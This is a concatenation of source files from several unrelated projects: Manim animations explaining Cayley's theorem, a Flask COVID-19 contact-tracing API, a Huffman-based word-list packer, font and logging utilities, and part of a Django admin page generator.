H = MathTex(r'H', r'=', r'\{', r'T', r'_g', r'\, | \,', r'g', r'\in', r'G', r'\}').scale(2)
H[4].set_color(BLUE)
H[6].set_color(BLUE)
self.play(
Write(H)
)
self.wait(2)
group_def.generate_target()
group_def.target.shift(0.25*LEFT)
H.generate_target()
H.target.scale(0.5)
H.target.next_to(group_def.target, 4*RIGHT)
Tg_func.generate_target()
Tg_func.target.next_to(H.target, 4*RIGHT)
self.play(
MoveToTarget(H),
MoveToTarget(group_def),
MoveToTarget(Tg_func)
)
props = BulletedList('associativity', 'existence of identity element', r'existence of inverse elements\phantom{y}', r'closure\phantom{y}')
label = Tex('Under composition, $H$ satisfies\ldots')
props.shift(DOWN)
label.next_to(props, 2*UP)
props.shift(2*LEFT)
self.play(
Write(label)
)
self.play(
Write(props)
)
self.wait(2)
check = MathTex(r'\checkmark').set_color(GREEN)
checks = VGroup()
for i in range(4):
checks.add(check.copy())
checks[i].next_to(props[i], RIGHT)
identity = MathTex(r'e_H=T', r'_e')
identity[1].set_color(BLUE)
identity.next_to(checks[-3], RIGHT)
inverse = MathTex(r'(T', r'_g', r')^{-1}=T', r'_{g^{-1}}')
inverse[1].set_color(BLUE)
inverse[3].set_color(BLUE)
inverse.next_to(checks[-2], RIGHT)
closure = MathTex(r'T', r'_a', r'\circ', r'T', r'_b', r'=', r'T', r'_{a', r'*', r'b}')
closure[1].set_color(BLUE)
closure[4].set_color(BLUE)
closure[7].set_color(BLUE)
closure[8].set_color(RED)
closure[9].set_color(BLUE)
closure.next_to(checks[-1], RIGHT)
extra = [None, identity, inverse, closure]
for i in range(4):
self.play(
Write(checks[i])
)
if extra[i] is not None:
self.play(
Write(extra[i])
)
self.wait(1)
self.wait(2)
H_group = MathTex(r'H', r'=', r'(\{', r'T', r'_g', r'\, | \,', r'g', r'\in', r'G', r'\},\circ)')
H_group.move_to(H)
H_group[4].set_color(BLUE)
H_group[6].set_color(BLUE)
self.play(
ReplacementTransform(H, H_group)
)
self.wait(2)
self.play(
*[Unwrite(check) for check in checks],
*[Unwrite(ex) for ex in extra if ex is not None],
Unwrite(label),
Unwrite(props)
)
self.wait(2)
class Cayley4(Scene):
def construct(self):
group_def = MathTex(r'G = \left(', r'\{g_1, g_2, ...\}', r',', r'*', r'\right)')
group_def[1].set_color(BLUE)
group_def[3].set_color(RED)
group_def.move_to(UP * 3 + LEFT * 4.25)
H = MathTex(r'H', r'=', r'\{', r'T', r'_g', r'\, | \,', r'g', r'\in', r'G', r'\}')
H[4].set_color(BLUE)
H[6].set_color(BLUE)
H.next_to(group_def, 4*RIGHT)
Tg_func = MathTex(r'T', r'_g', r'(', r'x', r') =', r'g', r'*', r'x')
Tg_func[1].set_color(BLUE)
Tg_func[5].set_color(BLUE)
Tg_func[6].set_color(RED)
Tg_func.next_to(H, 4*RIGHT)
H_group = MathTex(r'H', r'=', r'(\{', r'T', r'_g', r'\, | \,', r'g', r'\in', r'G', r'\},\circ)')
H_group[4].set_color(BLUE)
H_group[6].set_color(BLUE)
H_group.move_to(H)
divider = Line(array([-10, 0, 0]), array([10, 0, 0]), color=YELLOW)
divider.move_to(UP * 2.5)
self.add(group_def, H_group, Tg_func, divider)
phi_map = MathTex(r'\varphi', r': G \rightarrow H').scale(2)
phi_map[0].set_color(GOLD)
self.play(
Write(phi_map)
)
self.wait(2)
self.play(
Unwrite(phi_map[1:])
)
phi_func = MathTex(r'\varphi', r'(', r'g', r')', r'=', r'T', r'_g').scale(2)
phi_func[0].set_color(GOLD)
phi_func[2].set_color(BLUE)
phi_func[-1].set_color(BLUE)
self.play(
Transform(phi_map[0], phi_func[0])
)
self.play(
Write(phi_func[1:])
)
self.wait(2)
self.remove(phi_map[0])
phi_func.generate_target()
phi_func.target.scale(0.5)
phi_func.target.shift(UP*2)
phi_func.target.align_to(group_def, LEFT)
self.play(
MoveToTarget(phi_func)
)
self.wait(2)
homo = MathTex(r'\varphi', '(', 'a', ')\circ', r'\varphi', '(', 'b', ')').scale(2)
homo[0].set_color(GOLD)
homo[2].set_color(BLUE)
homo[4].set_color(GOLD)
homo[6].set_color(BLUE)
homo_full = MathTex(r'\varphi', '(', 'a', r')\circ', r'\varphi', '(', 'b', ')', '=', 'T', '_a', r'\circ', 'T', '_b').scale(2)
homo_full[0].set_color(GOLD)
homo_full[2].set_color(BLUE)
homo_full[4].set_color(GOLD)
homo_full[6].set_color(BLUE)
homo_full[10].set_color(BLUE)
homo_full[13].set_color(BLUE)
homo_simp = MathTex(r'\varphi', '(', 'a', ')\circ', r'\varphi', '(', 'b', ')', '=', 'T', '_{a', '*', 'b}').scale(2)
homo_simp[0].set_color(GOLD)
homo_simp[2].set_color(BLUE)
homo_simp[4].set_color(GOLD)
homo_simp[6].set_color(BLUE)
homo_simp[10].set_color(BLUE)
homo_simp[11].set_color(RED)
homo_simp[12].set_color(BLUE)
homo_homo = MathTex(r'\varphi', '(', 'a', ')\circ', r'\varphi', '(', 'b', ')', '=', r'\varphi', '(', 'a', '*', 'b', ')').scale(2)
homo_homo[0].set_color(GOLD)
homo_homo[2].set_color(BLUE)
homo_homo[4].set_color(GOLD)
homo_homo[6].set_color(BLUE)
homo_homo[9].set_color(GOLD)
homo_homo[11].set_color(BLUE)
homo_homo[12].set_color(RED)
homo_homo[13].set_color(BLUE)
self.play(
Write(homo)
)
self.wait(2)
self.play(
ReplacementTransform(homo, homo_full[:8])
)
self.remove(homo)
self.play(
Write(homo_full[8:])
)
self.wait(2)
self.play(
Unwrite(homo_full[9:])
)
self.play(
ReplacementTransform(homo_full[:9], homo_simp[:9])
)
self.remove(homo_full)
self.play(
Write(homo_simp[9:])
)
self.wait(2)
self.play(
Unwrite(homo_simp[9:])
)
self.play(
ReplacementTransform(homo_simp[:9], homo_homo[:9])
)
self.remove(homo_simp)
self.play(
Write(homo_homo[9:])
)
self.wait(2)
self.play(
Unwrite(homo_homo[1:])
)
conc = Tex(r'$\varphi$', ' is a homomorphism!').scale(2)
conc[0].set_color(GOLD)
self.play(
ReplacementTransform(homo_homo[0], conc[0])
)
self.play(
Write(conc[1:])
)
self.wait(2)
self.remove(homo_homo[0])
self.play(
Unwrite(conc)
)
self.wait(2)
class Cayley5(Scene):
def construct(self):
group_def = MathTex(r'G = \left(', r'\{g_1, g_2, ...\}', r',', r'*', r'\right)')
group_def[1].set_color(BLUE)
group_def[3].set_color(RED)
group_def.move_to(UP * 3 + LEFT * 4.25)
H = MathTex(r'H', r'=', r'\{', r'T', r'_g', r'\, | \,', r'g', r'\in', r'G', r'\}')
H[4].set_color(BLUE)
H[6].set_color(BLUE)
H.next_to(group_def, 4 * RIGHT)
Tg_func = MathTex(r'T', r'_g', r'(', r'x', r') =', r'g', r'*', r'x')
Tg_func[1].set_color(BLUE)
Tg_func[5].set_color(BLUE)
Tg_func[6].set_color(RED)
Tg_func.next_to(H, 4 * RIGHT)
H_group = MathTex(r'H', r'=', r'(\{', r'T', r'_g', r'\, | \,', r'g', r'\in', r'G', r'\},\circ)')
H_group[4].set_color(BLUE)
H_group[6].set_color(BLUE)
H_group.move_to(H)
phi_func = MathTex(r'\varphi', r'(', r'g', r')', r'=', r'T', r'_g')
phi_func[0].set_color(GOLD)
phi_func[2].set_color(BLUE)
phi_func[-1].set_color(BLUE)
phi_func.shift(UP * 2)
phi_func.align_to(group_def, LEFT)
divider = Line(array([-10, 0, 0]), array([10, 0, 0]), color=YELLOW)
divider.move_to(UP * 2.5)
self.add(group_def, H_group, Tg_func, phi_func, divider)
inj1 = MathTex(r'\varphi', r'(', r'a', r')', r'=', r'\varphi', '(', 'b', ')').scale(2)
inj1[0].set_color(GOLD)
inj1[2].set_color(BLUE)
inj1[5].set_color(GOLD)
inj1[7].set_color(BLUE)
inj2 = MathTex(r'T', r'_a', r'=', r'T', '_b').scale(2)
inj2[1].set_color(BLUE)
inj2[4].set_color(BLUE)
inj3 = MathTex(r'T', r'_a', r'(x)', r'=', r'T', '_b', r'(x)').scale(2)
inj3[1].set_color(BLUE)
inj3[5].set_color(BLUE)
inj4 = MathTex(r'a', r'*', r'x', r'=', r'b', '*', r'x').scale(2)
inj4[0].set_color(BLUE)
inj4[1].set_color(RED)
inj4[4].set_color(BLUE)
inj4[5].set_color(RED)
inj5 = MathTex(r'a', r'=', r'b').scale(2)
inj5[0].set_color(BLUE)
inj5[2].set_color(BLUE)
inj = Tex(r'$\varphi$', r' is injective\ldots')
inj[0].set_color(GOLD)
surj = Tex(r'$\varphi$', r' is surjective because it is defined as a function.')
surj[0].set_color(GOLD)
self.play(
Write(surj)
)
self.wait(2)
self.play(
Unwrite(surj)
)
self.wait(2)
self.play(
Write(inj)
)
self.wait(2)
self.play(
Unwrite(inj)
)
self.wait(2)
self.play(
Write(inj1)
)
self.wait(2)
self.play(
ReplacementTransform(inj1, inj2)
)
self.wait(2)
self.play(
ReplacementTransform(inj2, inj3)
)
self.wait(2)
self.play(
ReplacementTransform(inj3, inj4)
)
self.wait(2)
self.play(
ReplacementTransform(inj4, inj5)
)
self.wait(2)
self.play(
Unwrite(inj5)
)
self.wait(2)
conc = MathTex(r'G \approx H').scale(2)
self.play(
Write(conc)
)
self.wait(2)
self.play(
Unwrite(conc)
)
self.wait(2)
class CayleyIntro(Scene):
def construct(self):
title = Tex('Cayley\'s Theorem').scale(3)
title.shift(UP)
line = Line(6*LEFT, 6*RIGHT)
line.next_to(title, DOWN)
desc = Tex(r'Every group is isomorphic to some permutation group.')
desc.next_to(line, DOWN*2)
self.play(
Write(title),
Create(line)
)
self.wait(2)
self.play(
Write(desc)
)
self.wait(2)
self.play(
Unwrite(title),
Unwrite(desc),
Uncreate(line)
)
self.wait(2)
```
#### File: src/manim/section_intro_cards.py
```python
from manim import *
import sys
def draw_intro(self: Scene, section_number: int, subtitle: str) -> None:
text = MarkupText(
f"Section {section_number}:\n<span size=\"xx-small\">{subtitle}</span>",
font_size=100
)
self.play(Write(text, run_time=5))
self.wait(0.3)
self.play(text.animate.shift(DOWN * 10))
self.wait()
class Intro1(Scene):
def construct(self):
draw_intro(self, 1, "What is a permutation group?")
class Intro2(Scene):
def construct(self):
draw_intro(self, 2, "Examples of permutation groups")
class Intro3(Scene):
def construct(self):
draw_intro(self, 3, "Properties and theorems")
class Intro4(Scene):
def construct(self):
draw_intro(self, 4, "Related math theory")
``` |
{
"source": "a2441918/covid19-api",
"score": 2
} |
#### File: api/controllers/controllers.py
```python
from src.database import db
from src.models.people_model import People
from src.models.test_result_model import TestResultModel
from src.models.met_person_model import MetPerson
from src.models.meeting_model import Meeting
def create_new_person(data):
Name = data.get('Name')
Contact = data.get('Contact')
people = People(Name, Contact)
db.session.add(people)
db.session.commit()
def update_test_result_status(data):
PersonId = data.get('PersonId')
TestTakenDate = data.get('TestTakenDate')
TestResultStatus = data.get('TestResultStatus')
test_result = TestResultModel(PersonId, TestResultStatus, TestTakenDate)
db.session.add(test_result)
db.session.commit()
def update_person_contact(data):
    PersonId = data.get('PersonId')
    MetPersonId = data.get('MetPersonId')
    MetPersonDate = data.get('MetPersonDate')
    meeting = Meeting(MetPersonDate)
    db.session.add(meeting)
    # Flushing assigns the auto-increment primary key to `meeting`
    # without committing, so re-querying for the newest row is not needed
    # (and would be racy under concurrent writes).
    db.session.flush()
    if meeting.id is not None:
        meetingPerson = MetPerson(PersonId, MetPersonId, MetPersonDate, meeting.id)
        db.session.add(meetingPerson)
        db.session.commit()
def update_meeting(data):
CreatedAt = data.get('MetPersonDate')
meeting = Meeting(CreatedAt)
db.session.add(meeting)
db.session.commit()
```
#### File: controllers/endpoints/statuses.py
```python
import logging
from flask import request
from flask_restx import Resource
from src.api import api
from src.api.controllers.serializers import quarantine_status, covid_status, test_result_status
log = logging.getLogger(__name__)
ns = api.namespace('status', description='Operations related to statuses')
@ns.route('/getQuarantineStatus')
@api.response(404, 'Endpoint not found.')
class GetAllQuarantineStatus(Resource):
@api.marshal_with(quarantine_status)
def get(self):
return [{
'id': 0,
'Status': 'Healthy',
'Color': 'Green'
}, {
'id': 1,
'Status': 'Risk',
'Color': 'Yellow'
}, {
'id': 2,
'Status': 'High Risk',
'Color': 'Red'
}]
@ns.route('/getCovidStatus')
@api.response(404, 'Endpoint not found.')
class GetAllCovidStatus(Resource):
@api.marshal_with(covid_status)
def get(self):
return [{
'id': 0,
'Status': 'Never Infected',
}, {
'id': 1,
'Status': 'Infected',
}, {
'id': 2,
'Status': 'Recovered',
}]
@ns.route('/getTestResultStatus')
@api.response(404, 'Endpoint not found.')
class GetAllTestResultStatus(Resource):
@api.marshal_with(test_result_status)
def get(self):
return [{
'id': 0,
'Status': 'Positive',
}, {
'id': 1,
'Status': 'Negative',
}]
```
#### File: controllers/endpoints/users.py
```python
import logging
from flask import request
from flask_restx import Resource, abort
from src.database import db
from src.request_validation import json_request
from src.api.controllers.controllers import create_new_person, update_test_result_status, update_person_contact
from src.api import api
from src.models.people_model import People
from src.api.controllers.serializers import people, test_result, person_meeting
from enum import IntEnum
log = logging.getLogger(__name__)
ns = api.namespace('users', description='Operations related to users')
class QuarantineStatusEnum(IntEnum):
HEALTHY = 0
RISK = 1
HIGH_RISK = 2
class CovidStatusEnum(IntEnum):
NEVER_INFECTED = 0
INFECTED = 1
RECOVERED = 2
class TestResultStatusEnum(IntEnum):
POSITIVE = 0
NEGATIVE = 1
@ns.route('/createNewUsers')
@api.response(404, 'Endpoint not found.')
class CreateNewPerson(Resource):
@api.expect(people, validate=True)
    @api.response(200, 'User successfully created.')
@json_request
def post(self):
"""
Creates a new user.
"""
data = request.json
create_new_person(data)
return data, 200
@ns.route('/getUsers')
@api.response(404, 'Endpoint not found.')
class GetAllPeople(Resource):
@api.marshal_with(people)
def get(self):
peopleData = People.query.all()
return peopleData
@ns.route('/updateUserTestResultStatus')
@api.response(404, 'Endpoint not found.')
class UpdateUserTestResultStatus(Resource):
@api.expect(test_result, validate=True)
    @api.response(200, 'Test result status successfully updated.')
@json_request
def post(self):
"""
Updates the test result status of a user.
"""
data = request.json
PersonId = data.get('PersonId')
TestResultStatus = data.get('TestResultStatus')
person = People.query.filter_by(id=PersonId).first()
if person.CurrentCovidStatus == CovidStatusEnum.NEVER_INFECTED and TestResultStatus == TestResultStatusEnum.NEGATIVE:
abort(409, 'Person is not infected at all')
if person.CurrentCovidStatus == CovidStatusEnum.INFECTED and TestResultStatus == TestResultStatusEnum.POSITIVE:
abort(409, 'Person is already infected')
if person.CurrentCovidStatus == CovidStatusEnum.RECOVERED:
abort(409, "Person is recovered")
if person.CurrentCovidStatus == CovidStatusEnum.INFECTED and TestResultStatus == TestResultStatusEnum.NEGATIVE:
person.QuarantineStatus = QuarantineStatusEnum.RISK
person.CurrentCovidStatus = CovidStatusEnum.RECOVERED
person.UpdatedAt = db.func.now()
if person.CurrentCovidStatus == CovidStatusEnum.NEVER_INFECTED and TestResultStatus == TestResultStatusEnum.POSITIVE:
person.QuarantineStatus = QuarantineStatusEnum.HIGH_RISK
person.CurrentCovidStatus = CovidStatusEnum.INFECTED
person.UpdatedAt = db.func.now()
db.session.commit()
update_test_result_status(data)
return data, 200
@ns.route('/updatePersonMeeting')
@api.response(404, 'Endpoint not found.')
class UpdatePersonMeetingStatus(Resource):
@api.expect(person_meeting, validate=True)
    @api.response(200, 'Meeting successfully recorded.')
@json_request
def post(self):
"""
Updates the meeting status of a user.
"""
data = request.json
update_person_contact(data)
return data, 200
```
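For orientation, a hypothetical client call against the create endpoint above; the host, port, and route prefix are assumptions (they depend on how the `users` namespace is mounted), and the payload fields follow what `create_new_person` reads:

```python
import requests

# Matches create_new_person(), which reads 'Name' and 'Contact'.
resp = requests.post(
    "http://localhost:5000/users/createNewUsers",
    json={"Name": "Jane Doe", "Contact": "555-0100"},
)
print(resp.status_code, resp.json())
```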
#### File: src/models/met_person_model.py
```python
from datetime import datetime
from src.database import db
class MetPerson(db.Model):
__tablename__ = 'PersonMeeting'
PersonId = db.Column(db.Integer, db.ForeignKey('People.id'), primary_key=True, nullable=False)
MeetingId = db.Column(db.Integer, db.ForeignKey('Meeting.id'), primary_key=True, nullable=False)
MetPersonId = db.Column(db.Integer, nullable=False)
CreatedAt = db.Column(db.DateTime, default=db.func.now())
    # Constraints must be registered via __table_args__; a bare
    # db.UniqueConstraint(...) expression in the class body is discarded.
    __table_args__ = (db.UniqueConstraint('PersonId', 'MetPersonId'),)
def __init__(self, PersonId, MetPersonId, CreatedAt, MeetingId):
self.PersonId = PersonId
self.MetPersonId = MetPersonId
self.CreatedAt = CreatedAt
self.MeetingId = MeetingId
def __repr__(self):
return '<MetPersonId %r>' % self.MetPersonId
```
#### File: covid19-api/src/request_validation.py
```python
from flask import abort, request
from functools import wraps
def json_request(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not request.is_json:
abort(415)
return fn(*args, **kwargs)
return wrapper
``` |
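As a minimal sketch (assumed usage, not part of the repo), the decorator can guard any Flask view; non-JSON requests are rejected with 415 before the handler body runs:

```python
from flask import Flask, jsonify, request

from src.request_validation import json_request

app = Flask(__name__)

@app.route("/echo", methods=["POST"])
@json_request
def echo():
    # Only reached when the request carries a JSON content type.
    return jsonify(request.json)
```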
{
"source": "a2-4am/million-perfect-letters",
"score": 3
} |
#### File: res/Courier Double Prime/font.py
```python
def myhex(bitstring):
return hex(int(bitstring, 2))[2:].rjust(2, "0").upper()
leftdata = [ [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [] ]
rightdata = [ [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [] ]
with open("font.txt", "r") as f:
    # Glyphs are read in alphabetical order; the output below labels
    # each byte with chr(i+65), so the order must be A-Z.
    for c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
#print(c)
for row in range(16):
left = f.read(7)
right = f.read(7)
f.readline()
left = "0b1" + left[::-1]
right = "0b1" + right[::-1]
#print(myhex(left), myhex(right))
leftdata[row].append(myhex(left))
rightdata[row].append(myhex(right))
print("; Courier Double Prime pixel font")
print("; (c) 2019-2020 by 4am")
print("; license:Open Font License 1.1, see OFL.txt")
print("; This file is automatically generated")
for row in range(16):
print("LeftFontRow%s" % row)
    for i, c in enumerate(leftdata[row]):
        print(" !byte $%s ; %s" % (c, chr(i+65)))
for row in range(16):
print("RightFontRow%s" % row)
    for i, c in enumerate(rightdata[row]):
        print(" !byte $%s ; %s" % (c, chr(i+65)))
``` |
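To make the bit packing concrete, a tiny worked example; the meaning of the forced high bit (e.g. as a display palette bit) is an assumption, since the script itself does not say:

```python
# A 7-pixel row "0011101" is reversed to LSB-first order, then a set
# high bit is prepended: "0b1" + "0011101"[::-1] -> "0b11011100".
print(myhex("0b1" + "0011101"[::-1]))  # -> DC (0b11011100 == 0xDC)
```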
{
"source": "a2-4am/untitled-word-game",
"score": 3
} |
#### File: untitled-word-game/bin/packer.py
```python
from bitstring import BitArray
import collections
import itertools
import math
import sys
import time
class Tree:
def __init__(self, left=None, right=None):
self.left = left
self.right = right
def construct_frequency_tree(freqs):
nodes = freqs
while len(nodes) > 1:
key1, val1 = nodes[-1]
key2, val2 = nodes[-2]
node = Tree(key1, key2)
nodes = nodes[:-2]
nodes.append((node, val1 + val2))
nodes = sorted(nodes, key=lambda x: x[1], reverse=True)
return nodes
def generate_huffman_code(node, binary, is_left_node=True):
if isinstance(node, str) or isinstance(node, int):
return {node: binary}
d = {}
d.update(generate_huffman_code(node.left, binary + [0], True))
d.update(generate_huffman_code(node.right, binary + [1], False))
return d
def count_frequencies(string):
freq = collections.defaultdict(int)
for char in string:
freq[char] += 1
return sorted(freq.items(), key=lambda x: x[1], reverse=True)
def max_len_table(tables):
return max([len(huff) for huff in tables])
def bits_needed_to_represent(num):
    # Number of bits in the binary representation of num (e.g. 26 -> 5).
    return num.bit_length()
def leaves_at_depth(trie, target_level, level=0):
if level == target_level:
return trie.keys()
keys = []
for v in trie.values():
keys += leaves_at_depth(v, target_level, level+1)
return keys
def count_children_trie(trie, children):
children.append(len(trie.keys()))
for k, v in trie.items():
count_children_trie(v, children)
def max_children_trie(trie):
max_len = 0
for k, v in trie.items():
v_len = len(v.keys())
max_len = max(max_len, v_len)
max_len = max(max_len, max_children_trie(v))
return max_len
def convert_trie_to_bits(trie, bit_trie, tables, depth=0, smart=False):
for k, v in trie.items():
if not smart or v.keys():
bit_trie.append(tables[-1][len(v.keys())])
bit_trie.append(tables[depth][k])
convert_trie_to_bits(v, bit_trie, tables, depth+1, smart=smart)
class BitStream:
    def __init__(self, bit_array, char_map=None):
        self.bits = bit_array
        self.i = 0
        self.char_map = char_map
    @property
    def bin(self):
        # Recompute on access so reads reflect bits appended after
        # construction; a copy cached in __init__ would go stale.
        return self.bits.bin
def write(self, key, num_bits):
bits = []
val = self.char_map[key] if isinstance(key, str) else key
mask = 0b1 << num_bits - 1
for i in range(1, num_bits + 1):
bits.append((val & mask) >> num_bits - i)
mask >>= 1
self.bits.append(bits)
def append(self, data):
self.bits.append(data)
def read(self, num_bits):
bits = self.bin[self.i:self.i+num_bits]
self.i += num_bits
return bits
def read_int(self, num_bits):
return int(self.read(num_bits), 2)
def read_varint(self, table):
buf = ''
i = 0
while True:
buf += str(self.read(1))
if buf in table.keys():
return table[buf]
i += 1
def __len__(self):
return len(self.bits)
if __name__ == "__main__":
infile = sys.argv[1]
outfile = sys.argv[2]
with open(infile, 'r') as fp:
words = [w.strip() for w in fp.readlines()]
def gram_1(x):
return x
func = gram_1
INT_MAP = dict(zip(
list('ABCDEFGHIJKLMNOPQRSTUVWXYZ'),
range(26)
))
trie = {}
for word in words:
node = trie
for letter in func(word):
if letter not in node:
node[letter] = {}
node = node[letter]
tables = []
for i in range(len(func(words[0]))):
string = leaves_at_depth(trie, i)
freqs = count_frequencies(string)
tree = construct_frequency_tree(freqs)
huff = generate_huffman_code(tree[0][0], [])
total = sum([x[1] for x in freqs])
smaller = 0
bigger = 0
for k, v in sorted(freqs, key=lambda x: x[1], reverse=True):
if len(huff[k]) < 5:
smaller += v
if len(huff[k]) > 5:
bigger += v
print("{} | {} | {} | {:0.1f}%".format(k, "".join(map(str, huff[k])), v,
v/total*100))
print("Smaller: {:0.1f}%".format(smaller / total * 100))
print("Bigger: {:0.1f}%".format(bigger / total * 100))
print("")
tables.append(huff)
string = []
count_children_trie(trie, string)
freqs = count_frequencies(string)
tree = construct_frequency_tree(freqs[1:])
huff = generate_huffman_code(tree[0][0], [])
total = sum([x[1] for x in freqs[1:]])
smaller = 0
bigger = 0
print(huff, freqs)
for k, v in sorted(freqs[1:], key=lambda x: x[1], reverse=True):
if len(huff[k]) < 5:
smaller += v
if len(huff[k]) > 5:
bigger += v
print("{} | {} | {} | {:0.1f}%".format(k, "".join(map(str, huff[k])), v,
v/total*100))
print("Smaller: {:0.1f}%".format(smaller / total * 100))
print("Bigger: {:0.1f}%".format(bigger / total * 100))
print("")
tables.append(huff)
bits = BitStream(BitArray(), char_map=INT_MAP)
table_size = bits_needed_to_represent(max_len_table(tables))
word_size = bits_needed_to_represent(len(INT_MAP))
num_tables = len(tables)
num_symbols = len(tables[0])
# Header.
bits.write(table_size, 8)
bits.write(word_size, 8)
bits.write(num_tables, 8)
bits.write(num_symbols, 16)
# Encode the Huffman tables.
header_size = len(bits)
for table in tables:
bits.write(len(table), table_size)
for char, binary in table.items():
bits.write(char, word_size)
bits.write(len(binary), 8)
bits.append(binary)
huff_size = len(bits) - header_size
# Encode the payload.
max_children = max_children_trie(trie)
convert_trie_to_bits(trie, bits.bits, tables, smart=True)
payload_size = len(bits) - huff_size
print("#")
print("# Encoding")
print("#")
print("")
print("Table Size Bits:", table_size)
print("Huffman Table Word Bits:", word_size)
print("Num Tables:", num_tables)
print("Num Symbols", num_symbols)
for i, table in enumerate(tables):
print("Table {}:".format(i), len(table))
print("")
print("Header (Bytes):", math.ceil(header_size / 8))
print("Tables (Bytes):", math.ceil(huff_size / 8))
print("Payload (Bytes):", math.ceil(payload_size / 8))
print("Filesize (Bytes):", math.ceil(len(bits) / 8))
print("")
with open(outfile, "wb") as fp:
fp.write(bits.bits.tobytes())
print("Wrote", outfile)
``` |
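For reference, a small sketch (not part of the packer itself) showing how the frequency helpers cooperate to build a prefix code for a toy string; it assumes the functions above are importable:

```python
# Build a Huffman code for a toy string and encode it bit by bit.
freqs = count_frequencies("ABRACADABRA")
tree = construct_frequency_tree(freqs)
code = generate_huffman_code(tree[0][0], [])
encoded = [bit for ch in "ABRACADABRA" for bit in code[ch]]
print(code)                  # e.g. {'A': [0], 'R': [1, 0], ...} (shapes vary)
print(len(encoded), "bits")  # far fewer than 11 chars * 8 bits
```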
{
"source": "a24ibrah/Project0001",
"score": 2
} |
#### File: a24ibrah/Project0001/gethandler.py
```python
import tornado.web
class GetHandler(tornado.web.RequestHandler):
def initialize(self, books):
self.books = books
def get(self):
self.write(self.books.json_list())
``` |
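For context, a minimal sketch of how such a handler is typically wired into a Tornado application; the `Books` stub, route, and port are assumptions, not from the original repo:

```python
import tornado.ioloop
import tornado.web

from gethandler import GetHandler

class Books:
    # Stand-in for whatever object the app passes in; GetHandler only
    # requires a json_list() method returning a string.
    def json_list(self):
        return '[{"title": "Example Book"}]'

def make_app():
    return tornado.web.Application([
        (r"/books", GetHandler, dict(books=Books())),
    ])

if __name__ == "__main__":
    make_app().listen(8888)
    tornado.ioloop.IOLoop.current().start()
```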
{
"source": "a24ma/aoutil",
"score": 3
} |
#### File: aoutil/aoutil/now.py
```python
from logging import getLogger
from datetime import datetime
log = getLogger(__name__)
prev_ts = None
def now():
now = datetime.now()
    # Japanese weekday abbreviations, Monday through Sunday.
    youbi_list = ["月", "火", "水", "木", "金", "土", "日"]
    youbi = youbi_list[now.weekday()]
    fmt = f"%Y/%m/%d({youbi}) %H:%M:%S"
    msg = now.strftime(fmt)
log.info(msg)
return msg
def ts():
global prev_ts
now = datetime.now()
prev = prev_ts or now
dif = now - prev
    # total_seconds() also covers the day component of the delta;
    # seconds + microseconds alone would silently drop whole days.
    dif_us = int(dif.total_seconds() * 10**6)
    dif_str = f"{dif_us:+,d}us"
    fmt = f"%Y/%m/%d %H:%M:%S,%f {dif_str:>15s}"
    msg = now.strftime(fmt)
log.info(msg)
prev_ts = now
return msg
``` |
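A short usage sketch (assumed): both helpers log and return the formatted string, and ts() additionally reports the microsecond delta since its previous call:

```python
import logging

from aoutil.now import now, ts

logging.basicConfig(level=logging.INFO)
print(now())  # e.g. 2024/01/04(木) 12:34:56
ts()          # first call reports a +0us delta
ts()          # second call reports microseconds since the first ts()
```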
{
"source": "a24ma/msg2eml",
"score": 3
} |
#### File: msg2eml/logutil/helper.py
```python
import unicodedata
from logging import getLogger
from logging import StreamHandler
from logging import Formatter
from logging import NOTSET
from logging import DEBUG
def setup_logger(level=NOTSET):
logger = getLogger()
sh = StreamHandler()
formatter = Formatter('%(asctime)s [%(levelname)s] %(name)s > %(message)s')
sh.setFormatter(formatter)
logger.addHandler(sh)
logger.setLevel(level)
sh.setLevel(level)
return logger
def diff_str(s1, s2):
w = unicodedata.east_asian_width
out1 = ""
out2 = ""
diff = ""
for cs in zip(s1, s2):
c1, c2 = cs
w1, w2 = (2 if w(c) in "WF" else 1 for c in cs)
if w1 == w2:
out1 += f"{c1}"
out2 += f"{c2}"
if c1 == c2:
diff += " "[:w1]
else:
out1 += f"[{ord(c1):04x}]"
out2 += f"[{ord(c2):04x}]"
diff += "^-"[:w1] + "------"
else:
out1 += f"{c1:{w2}}[{ord(c1):04x}]"
out2 += f"{c2:{w1}}[{ord(c2):04x}]"
diff += "^-------"
return out1, out2, diff
def out_diff(s1, s2):
return ("""
* s1: %s
* s2: %s
* diff: %s
""" % diff_str(s1, s2))
``` |
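A brief illustration (assumed usage): differing code points are flagged with ^ markers and annotated with their hex values, and display widths are tracked so the columns stay aligned even for full-width characters:

```python
from logutil.helper import out_diff

# 'l' vs 'L' is flagged and annotated with the code points 006c/004c.
print(out_diff("hello", "heLlo"))
```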
{
"source": "a24zlab/django-antd-tyadmin",
"score": 2
} |
#### File: tyadmin_api_cli/adapters/django_celery_beat_ty_admin.py
```python
from django.http import JsonResponse
from tyadmin_api.custom import MtyCustomExecView
class PeriodicTask_task(MtyCustomExecView):
def get(self, request, *args, **kwargs):
from django_celery_beat.admin import TaskSelectWidget
ret = {}
for one in TaskSelectWidget().choices:
if one[0] != "":
ret[one[0]]= one[1]
return JsonResponse(ret)
```
#### File: django-antd-tyadmin/tyadmin_api_cli/deal_antd_pages.py
```python
import os
from django.conf import settings
from django.contrib.auth import get_user_model
from django.db.models import ForeignKey, CharField, DateTimeField, DateField, BooleanField, IntegerField, FloatField, FileField, ImageField, TextField
from tyadmin_api_cli.antd.constant import PASSWORD_UPDATE_FORM, UPDATE_PASSWORD_METHOD, PASSWORD_PLACE, PASSWORD_FORM
from tyadmin_api_cli.antd.field import *
from tyadmin_api_cli.adapters.field_adapter import FIELD_ADAPTER
from tyadmin_api_cli.contants import SYS_LABELS
from tyadmin_api_cli.fields import richTextField, SImageField
from tyadmin_api_cli import ty_admin_settings
from tyadmin_api_cli.utils import init_django_env, get_lower_case_name, trans
def adapter_priority(app_label, model_name, field_name, key):
try:
if key in FIELD_ADAPTER[app_label][model_name][field_name]:
return True
except KeyError:
return False
def style_adapter_priority(app_label, model_name, field_name, key):
try:
if key in settings.TY_ADMIN_CONFIG["REWRITE"][app_label][model_name][field_name]:
return True
except KeyError:
try:
if key in ty_admin_settings.TY_ADMIN_CONFIG["REWRITE"][app_label][model_name][field_name]:
return True
except KeyError:
return False
def gen_antd_pages(project_name_settings, user_label_list, focus_model=None, template_type="base"):
init_django_env(project_name_settings)
import django
from django.conf import settings
if not user_label_list:
user_label_list = settings.TY_ADMIN_CONFIG["GEN_APPS"]
try:
